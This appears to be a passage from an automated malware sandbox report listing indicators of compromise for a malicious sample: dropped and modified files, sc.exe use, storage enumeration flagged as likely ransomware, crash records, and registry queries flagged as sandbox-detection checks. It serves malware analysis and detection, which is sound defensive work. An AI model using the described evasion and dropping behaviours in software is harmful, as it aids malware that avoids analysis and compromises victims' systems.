File created | C:\Program Files (x86)\Company\NewProduct\tmp.edb | md8_8eus.exe
File created | C:\Program Files (x86)\MaskVPN\is-6IKR8.tmp | Setup.tmp
File created | C:\Program Files\Uninstall Information\IBUGQFVAQG\ultramediaburner.exe.config | ultradumnibour.exe
File created | C:\Program Files\Windows Security\7d3d368b80e270c0d20b0e16f8ca721b1752ba91 | WerFault.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\MaskVPN\mask_svc.exe | Setup.tmp
File created | C:\Program Files (x86)\Google\Gafyjagufo.exe | ultradumnibour.exe
File opened for modification | C:\Program Files (x86)\Sofware IN LLC\unins000.dat | Esplorarne.exe.com
File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | Setup.tmp
-
Drops file in Windows directory 36 IoCs
Processes: MicrosoftEdge.exe, msiexec.exe, Esplorarne.exe.com, Esplorarne.exe.com, xRxZGAoA5TFUm46yqDqWyLKe.exe, svchost.exe, svchost.exe, DrvInst.exe, WerFault.exe, tapinstall.exe, Esplorarne.exe.com, MicrosoftEdge.exe, MicrosoftEdge.exe, MicrosoftEdge.exe
description | ioc | process
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\Installer\MSI8F13.tmp | msiexec.exe
File opened for modification | C:\Windows\inf\oem2.inf | Esplorarne.exe.com
File opened for modification | C:\Windows\Debug\ESE.TXT | Esplorarne.exe.com
File opened for modification | C:\Windows\GameBarPresenceWriter\4b5m9Xjbeh4Y9rTVY8V4famT.exe | xRxZGAoA5TFUm46yqDqWyLKe.exe
File opened for modification | C:\Windows\Installer\MSIF09C.tmp | msiexec.exe
File opened for modification | C:\Windows\Logs\DPX\setuperr.log | svchost.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | svchost.exe
File opened for modification | C:\Windows\Logs\DPX\setupact.log | svchost.exe
File opened for modification | C:\Windows\Installer\MSI8A01.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File created | C:\Windows\INF\oem2.PNF | DrvInst.exe
File created | C:\Windows\InfusedApps\Frameworks\customer3.exe | WerFault.exe
File opened for modification | C:\Windows\Installer\MSIA1F2.tmp | msiexec.exe
File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | msiexec.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | tapinstall.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | Esplorarne.exe.com
File created | C:\Windows\GameBarPresenceWriter\aca10721b035278564e788014379df1f2aaf2a91 | xRxZGAoA5TFUm46yqDqWyLKe.exe
File created | C:\Windows\Installer\f78928e.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI823F.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI9F61.tmp | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | Esplorarne.exe.com
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\GameBarPresenceWriter\4b5m9Xjbeh4Y9rTVY8V4famT.exe | xRxZGAoA5TFUm46yqDqWyLKe.exe
File opened for modification | C:\Windows\Installer\f78928e.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI7E18.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIC0E7.tmp | msiexec.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | DrvInst.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File opened for modification | C:\Windows\Installer\MSI83D6.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI9CFF.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIAB89.tmp | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File created | C:\Windows\inf\oem2.inf | Esplorarne.exe.com
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
Processes: WerFault.exe (26 instances)
pid | pid_target | process | target process
4540 | 1392 | WerFault.exe | ySzhlkxv6lvVdaZGAMZc3MjG.exe
840 | 1392 | WerFault.exe | ySzhlkxv6lvVdaZGAMZc3MjG.exe
1732 | 2804 | WerFault.exe | 4b5m9Xjbeh4Y9rTVY8V4famT.exe
4132 | 1392 | WerFault.exe | ySzhlkxv6lvVdaZGAMZc3MjG.exe
5180 | 2240 | WerFault.exe | 9NeY7wDiJGhrvsW_GspXT3lp.exe
5388 | 2240 | WerFault.exe | 9NeY7wDiJGhrvsW_GspXT3lp.exe
2072 | 1392 | WerFault.exe | ySzhlkxv6lvVdaZGAMZc3MjG.exe
5516 | 2240 | WerFault.exe | 9NeY7wDiJGhrvsW_GspXT3lp.exe
5844 | 2240 | WerFault.exe | 9NeY7wDiJGhrvsW_GspXT3lp.exe
6052 | 2240 | WerFault.exe | 9NeY7wDiJGhrvsW_GspXT3lp.exe
6040 | 1392 | WerFault.exe | ySzhlkxv6lvVdaZGAMZc3MjG.exe
4820 | 2240 | WerFault.exe | 9NeY7wDiJGhrvsW_GspXT3lp.exe
4460 | 2240 | WerFault.exe | 9NeY7wDiJGhrvsW_GspXT3lp.exe
5200 | 2240 | WerFault.exe | 9NeY7wDiJGhrvsW_GspXT3lp.exe
6492 | 7096 | WerFault.exe | Vlaiw1QOxP2xyB7onsxPGq4k.exe
7292 | 7096 | WerFault.exe | Vlaiw1QOxP2xyB7onsxPGq4k.exe
7668 | 7096 | WerFault.exe | Vlaiw1QOxP2xyB7onsxPGq4k.exe
6008 | 7096 | WerFault.exe | Vlaiw1QOxP2xyB7onsxPGq4k.exe
7452 | 7016 | WerFault.exe | uQ1sY0V9BPG6y1BJhAoaX8hC.exe
2100 | 7096 | WerFault.exe | Vlaiw1QOxP2xyB7onsxPGq4k.exe
5320 | 2932 | WerFault.exe | gWbvKgUeUq65ebon4O0hHSuX.exe
8292 | 2932 | WerFault.exe | gWbvKgUeUq65ebon4O0hHSuX.exe
4212 | 2932 | WerFault.exe | gWbvKgUeUq65ebon4O0hHSuX.exe
1856 | 6764 | WerFault.exe | MicrosoftEdgeCP.exe
6404 | 8252 | WerFault.exe | MicrosoftEdgeCP.exe
8056 | 5072 | WerFault.exe | MicrosoftEdgeCP.exe
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes: Esplorarne.exe.com, 0cec99sYPHC4JtcYL6Dyhoy2.exe, tapinstall.exe, svchost.exe, GZCE7lNx2wr8c3GHhY6VpQGL.exe, tapinstall.exe, Esplorarne.exe.com, DrvInst.exe, lV0cLJRjBoCNp3_nrE9Ro2WP.exe, Esplorarne.exe.com
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | Esplorarne.exe.com
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 0cec99sYPHC4JtcYL6Dyhoy2.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags | tapinstall.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID | tapinstall.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | Esplorarne.exe.com
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | GZCE7lNx2wr8c3GHhY6VpQGL.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID | tapinstall.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs | tapinstall.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags | tapinstall.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 | DrvInst.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | Esplorarne.exe.com
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | lV0cLJRjBoCNp3_nrE9Ro2WP.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs | tapinstall.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | Esplorarne.exe.com
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID | tapinstall.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | svchost.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | Esplorarne.exe.com
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | GZCE7lNx2wr8c3GHhY6VpQGL.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 | tapinstall.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | Esplorarne.exe.com
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters | DrvInst.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags | Esplorarne.exe.com
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: RUNDLL32.EXE, RUNDLL32.EXE, svchost.exe, RUNDLL32.EXE, WerFault.exe, WerFault.exe, WerFault.exe, Esplorarne.exe.com, rundll32.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | RUNDLL32.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier | RUNDLL32.EXE
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | RUNDLL32.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | RUNDLL32.EXE
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information | RUNDLL32.EXE
Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 | RUNDLL32.EXE
Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier | RUNDLL32.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | RUNDLL32.EXE
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | RUNDLL32.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | RUNDLL32.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | RUNDLL32.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key value enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | RUNDLL32.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | RUNDLL32.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | RUNDLL32.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | RUNDLL32.EXE
-
